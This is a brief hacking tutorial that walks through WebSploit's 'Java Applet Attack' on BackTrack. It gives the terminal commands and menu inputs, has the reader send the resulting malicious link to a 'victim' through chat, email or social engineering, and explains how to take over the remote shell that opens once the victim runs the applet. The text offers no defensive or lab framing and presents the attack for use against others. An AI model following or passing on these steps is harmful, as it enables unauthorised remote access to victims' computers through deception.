First Install Websploit Toolkit in Backtrack
Open Your Backtrack terminal and Type cd /pentest/web/websploit
Now Open WebSploit Toolkit (SET) ./websploit
Now choose option 2 “Network Attack Vector”
Now choose option 3 “Java Applet Attack”
wsf: java Applet > Enter Interface Name: eth0
wsf: java Applet > Enter Your IP Address: 192.168.1.2
wsf: java Applet > Enter Main Applet’s Class Name: java
wsf: java Applet > Enter Name of Publisher: java
Now an URL you should give to your victim http://192.168.1.2:8080/index
Send the link of the server to the victim via chat or email or any social engineering technique.
When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.
If our victim click on the Run button then the exploit will executed and it will return a remote shell to our system. The next two images are proving that the attack was successful.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID